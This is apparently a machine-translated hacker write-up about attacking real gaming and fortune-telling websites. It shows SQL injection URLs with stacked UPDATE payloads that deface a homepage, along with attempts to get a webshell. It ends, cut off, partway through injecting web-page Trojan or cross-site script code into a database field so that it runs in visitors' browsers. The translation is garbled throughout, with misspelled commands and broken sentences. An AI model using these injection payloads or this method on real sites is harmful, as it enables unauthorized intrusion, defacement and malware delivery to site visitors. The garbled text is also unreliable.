We all know that the so-called cross-station attack is the lack of full filtering of the data input by the user. When the website viewer browsses information, the entered malicious script will be executed, which may be inserted into one end, which may be stealing browsing The Java script of cookie information is more like a web page Trojan code that uses IE vulnerabilities. This kind of attack method is easy and easy to implement after the WEBSHELL is inserted into the Trojan code. Of course, this method has its shortcomings, this will discuss it. Let me talk about the prerequisites for implementing cross-site attacks, of course, there is a place where input information is not strict. In some large non-mutual interaction websites, this type of input is generally refined, so it is quite tricky from the surface. We have considered it. If this website has a SQL injection point, the result is different. The database I said here is for the MSSQL database (of course, the database is effective, but it is difficult to handle it, but it is very difficult but very effective SQL injection vulnerability, but does not need admin privileges, as long as there is admin, UPDATE privilege is enough, and general DB_OWNER has this permission. We directly modify the information in the database, so that the ASP program is called when the database is called, the code of the modified webpage Trojan is displayed on the web page. Let me show the attack process with an example. Browse Taiwan Orange Site:
http://www.gamania.com
At the time, I found this place to inject:
Http://fateasia.gamania.com/turtle/index.asp?sid=e00001
One of the hearts of the heart. The quarter like this can also be injected, so take out the lucky psychology to take the home tool NBSI walk, guess the following information:
Permissions are DB_WONER to get the WEBSHELL's first method is to get through the backup permissions of DB_WONER. However, I have tried it on many websites, especially large websites, databases are quite huge, this method is not high. (At least I have not succeeded once, after all, I have limited technology, huh, huh, huh), successfully try again, first get the web physical path with the approach to the registry:
Specific method, some introduced in the pre-black defense, I am not pulling over. Of course, after getting the path, it is BackupWebshell.
Since this tool I have not seen CYF is how the INT type and characteristic data is determined, it adds a 'in the parameter in the URL, which is considered to be injecting integer data. Let's take a look at the results:
Failure, it seems that a routine attack will not have any new breakthrough, or another doctor.
Later, I looked at this divination webpage and saw the following information:
Oh, it turned out to be and
Www.fatesia.com
Cooperative station, first ping, two sites:
I didn't see it, it was on a server. Look at this site to see:
Well, do it, the website is also quite big, huh, huh, small samples think you, let's don't dare to whole you, squatting, there is a circle on the website, and there is also an injection point, but a pity is this station. Database and
Http://fateasia.gamania.com
Is the same database:
It seems that this is the main station:
Take a look at our backup Trojans on this station:
Http://www.fateasia.com/asp.asp Return 404
Error, it seems that it doesn't work, depressed.
At this time, I suddenly thought that since I can't get WebShell, then have we hung on the webpage Trojan or cross-station attack script without the shell? Because we have an operation permission to this site, this is theoretically feasible, excited, yes, direct operation of database cross-station attacks is indeed a particularly wide range of methods. Make some people spending a SHELL for the Some people to make a shell to hang the Trojan, and the time is expensive. It's just my idea. Let's take a look at it. Can you succeed?
First, you have to find a place in the Calling database in the ASP, and the general dynamic changes are called in the database.
We chose the most obvious place, (specific choices, you must rely on your experience, where you usually update, you will call the information in the database). as follows:
The red text that walks this place should call the information in the library.
View the source code to see:
I have to see the font. Everyone should see it. Because we have the traditional Chinese library, the selected font is pasted into a local web file to open, choose Traditional Chinese: Get the following information:
Ok, we look for this information in the database, because the database is quite large, I have to spend a lot of time to find,
The work is not paid, finally in the database, I gave the information:
Although it is chaotic in NB, I use IE to see this text:
Oh, like the screen displayed in the page, it seems to be this place. In order to confirm, I update the content in this field: Use the following command:
http://www.fateasia.com/fate.asp?sid=h00050'; ipdate runtext set runtext = 'acid by llikz (http://www.hacker.com.cn)';
Refer to the web page to see:
See it, we have successfully updated the information in its database, so a simple sentence will change this website home page, it is true that it is very accomplished. Below we have to try to invade malicious code in the database, I chose a webpage Trojan:
Http://www.fateasia.com/fate.asp?sid=h00050';update
RunText set runtext = 'test !!
